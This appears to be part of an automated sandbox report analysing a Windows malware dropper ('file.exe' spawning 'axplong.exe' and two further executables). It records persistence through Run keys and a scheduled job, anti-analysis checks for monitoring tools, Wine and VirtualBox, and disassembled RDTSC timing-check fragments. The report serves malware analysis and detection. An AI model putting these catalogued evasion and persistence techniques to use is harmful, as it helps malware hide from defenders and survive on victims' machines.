Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Unpacked PE file: 24.2.63371c25d6.exe.6c0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mmgyxokd:EW;ujjtsjxw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mmgyxokd:EW;ujjtsjxw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Unpacked PE file: 29.2.63371c25d6.exe.6c0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mmgyxokd:EW;ujjtsjxw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mmgyxokd:EW;ujjtsjxw:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 8_2_008E42DE
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.6.dr Static PE information: real checksum: 0x1c04c6 should be: 0x1c3ddb
Source: 63371c25d6.exe.6.dr Static PE information: real checksum: 0x1c04c6 should be: 0x1c3ddb
Source: axplong.exe.0.dr Static PE information: real checksum: 0x1d90e2 should be: 0x1daef4
Source: file.exe Static PE information: real checksum: 0x1d90e2 should be: 0x1daef4
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: lfxcpyub
Source: file.exe Static PE information: section name: hhzixuje
Source: file.exe Static PE information: section name: .taggant
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: lfxcpyub
Source: axplong.exe.0.dr Static PE information: section name: hhzixuje
Source: axplong.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: mmgyxokd
Source: random[1].exe.6.dr Static PE information: section name: ujjtsjxw
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: 63371c25d6.exe.6.dr Static PE information: section name:
Source: 63371c25d6.exe.6.dr Static PE information: section name: .rsrc
Source: 63371c25d6.exe.6.dr Static PE information: section name: .idata
Source: 63371c25d6.exe.6.dr Static PE information: section name:
Source: 63371c25d6.exe.6.dr Static PE information: section name: mmgyxokd
Source: 63371c25d6.exe.6.dr Static PE information: section name: ujjtsjxw
Source: 63371c25d6.exe.6.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_009ED84C push ecx; ret 6_2_009ED85F
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00900A76 push ecx; ret 8_2_00900A89
Source: file.exe Static PE information: section name: entropy: 7.98098366974593
Source: file.exe Static PE information: section name: lfxcpyub entropy: 7.953705767893421
Source: axplong.exe.0.dr Static PE information: section name: entropy: 7.98098366974593
Source: axplong.exe.0.dr Static PE information: section name: lfxcpyub entropy: 7.953705767893421
Source: random[1].exe.6.dr Static PE information: section name: mmgyxokd entropy: 7.954300536136823
Source: 63371c25d6.exe.6.dr Static PE information: section name: mmgyxokd entropy: 7.954300536136823
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b29e59e54d.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 63371c25d6.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 63371c25d6.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 63371c25d6.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b29e59e54d.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b29e59e54d.exe Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_008FF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 8_2_008FF98E
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00971C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 8_2_00971C41
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found API chain indicative of sandbox detection
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103F3CE second address: 103EBAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 or dword ptr [ebp+122D1939h], edx 0x0000000c push dword ptr [ebp+122D1265h] 0x00000012 pushad 0x00000013 ja 00007F99146B459Ch 0x00000019 or dword ptr [ebp+122D1932h], eax 0x0000001f popad 0x00000020 sub dword ptr [ebp+122D198Ah], eax 0x00000026 call dword ptr [ebp+122D18B8h] 0x0000002c pushad 0x0000002d pushad 0x0000002e pushad 0x0000002f mov dword ptr [ebp+122D32D6h], edi 0x00000035 mov ecx, 75AED8E5h 0x0000003a popad 0x0000003b popad 0x0000003c jmp 00007F99146B45A6h 0x00000041 xor eax, eax 0x00000043 pushad 0x00000044 mov edx, ecx 0x00000046 stc 0x00000047 popad 0x00000048 mov edx, dword ptr [esp+28h] 0x0000004c mov dword ptr [ebp+122D19A0h], ebx 0x00000052 mov dword ptr [ebp+122D374Ah], eax 0x00000058 jmp 00007F99146B45A3h 0x0000005d mov esi, 0000003Ch 0x00000062 xor dword ptr [ebp+122D19A0h], eax 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c jmp 00007F99146B45A6h 0x00000071 lodsw 0x00000073 pushad 0x00000074 mov ecx, dword ptr [ebp+122D3812h] 0x0000007a mov ebx, dword ptr [ebp+122D37E2h] 0x00000080 popad 0x00000081 add eax, dword ptr [esp+24h] 0x00000085 mov dword ptr [ebp+122D32D6h], ecx 0x0000008b mov ebx, dword ptr [esp+24h] 0x0000008f cmc 0x00000090 push eax 0x00000091 pushad 0x00000092 push eax 0x00000093 push edx 0x00000094 pushad 0x00000095 popad 0x00000096 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BA232 second address: 11BA236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BE72C second address: 11BE732 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BE732 second address: 11BE73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BE73C second address: 11BE742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BE742 second address: 11BE760 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F99150F94F6h 0x00000008 jmp 00007F99150F94FDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BE760 second address: 11BE784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F99146B45A6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BEA4A second address: 11BEA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BEA4E second address: 11BEA65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jnp 00007F99146B45B4h 0x0000000f jo 00007F99146B459Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BEA65 second address: 11BEA71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007F99150F94F6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1B3C second address: 11C1B42 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1B42 second address: 103EBAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F9508h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 7EF2A1CDh 0x00000010 mov ecx, edx 0x00000012 push dword ptr [ebp+122D1265h] 0x00000018 mov edi, dword ptr [ebp+122D3AB2h] 0x0000001e call dword ptr [ebp+122D18B8h] 0x00000024 pushad 0x00000025 pushad 0x00000026 pushad 0x00000027 mov dword ptr [ebp+122D32D6h], edi 0x0000002d mov ecx, 75AED8E5h 0x00000032 popad 0x00000033 popad 0x00000034 jmp 00007F99150F9506h 0x00000039 xor eax, eax 0x0000003b pushad 0x0000003c mov edx, ecx 0x0000003e stc 0x0000003f popad 0x00000040 mov edx, dword ptr [esp+28h] 0x00000044 mov dword ptr [ebp+122D19A0h], ebx 0x0000004a mov dword ptr [ebp+122D374Ah], eax 0x00000050 jmp 00007F99150F9503h 0x00000055 mov esi, 0000003Ch 0x0000005a xor dword ptr [ebp+122D19A0h], eax 0x00000060 add esi, dword ptr [esp+24h] 0x00000064 jmp 00007F99150F9506h 0x00000069 lodsw 0x0000006b pushad 0x0000006c mov ecx, dword ptr [ebp+122D3812h] 0x00000072 mov ebx, dword ptr [ebp+122D37E2h] 0x00000078 popad 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d mov dword ptr [ebp+122D32D6h], ecx 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 cmc 0x00000088 push eax 0x00000089 pushad 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d popad 0x0000008e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1B85 second address: 11C1BEC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F99146B459Dh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edx, dword ptr [ebp+122D3976h] 0x00000015 jmp 00007F99146B45A2h 0x0000001a push 00000000h 0x0000001c mov edx, edi 0x0000001e call 00007F99146B4599h 0x00000023 push ecx 0x00000024 jg 00007F99146B4598h 0x0000002a pop ecx 0x0000002b push eax 0x0000002c push eax 0x0000002d js 00007F99146B459Ch 0x00000033 jnc 00007F99146B4596h 0x00000039 pop eax 0x0000003a mov eax, dword ptr [esp+04h] 0x0000003e push esi 0x0000003f pushad 0x00000040 pushad 0x00000041 popad 0x00000042 pushad 0x00000043 popad 0x00000044 popad 0x00000045 pop esi 0x00000046 mov eax, dword ptr [eax] 0x00000048 pushad 0x00000049 push esi 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1BEC second address: 11C1C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F99150F9504h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1C07 second address: 11C1C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1C19 second address: 11C1C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1C1E second address: 11C1CA9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov cx, bx 0x0000000c push 00000003h 0x0000000e pushad 0x0000000f pushad 0x00000010 jnc 00007F99146B4596h 0x00000016 mov ebx, dword ptr [ebp+122D38D6h] 0x0000001c popad 0x0000001d mov dword ptr [ebp+124543E2h], esi 0x00000023 popad 0x00000024 push 00000000h 0x00000026 sub dword ptr [ebp+122D1AD5h], eax 0x0000002c push 00000003h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F99146B4598h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 push 7EF10D10h 0x0000004d jmp 00007F99146B45A1h 0x00000052 add dword ptr [esp], 410EF2F0h 0x00000059 mov cx, dx 0x0000005c lea ebx, dword ptr [ebp+12456A86h] 0x00000062 push edx 0x00000063 jmp 00007F99146B459Ah 0x00000068 pop esi 0x00000069 xchg eax, ebx 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1CA9 second address: 11C1CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1CAD second address: 11C1CB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1CB1 second address: 11C1CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1CB7 second address: 11C1CC1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99146B459Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1CC1 second address: 11C1CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F99150F94F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1CD5 second address: 11C1CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1D25 second address: 11C1D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1D2B second address: 11C1D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1D2F second address: 11C1D44 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jno 00007F99150F94F6h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1EB9 second address: 11C1EC3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F99146B459Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C1EC3 second address: 11C1F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 47E87418h 0x0000000d mov si, AAB7h 0x00000011 push 00000003h 0x00000013 jl 00007F99150F94F8h 0x00000019 mov cl, 65h 0x0000001b mov edx, dword ptr [ebp+122D3A8Eh] 0x00000021 push 00000000h 0x00000023 mov edi, dword ptr [ebp+124543E2h] 0x00000029 push 00000003h 0x0000002b mov esi, dword ptr [ebp+122D3A22h] 0x00000031 call 00007F99150F94F9h 0x00000036 pushad 0x00000037 push ecx 0x00000038 jmp 00007F99150F9503h 0x0000003d pop ecx 0x0000003e jc 00007F99150F94FCh 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
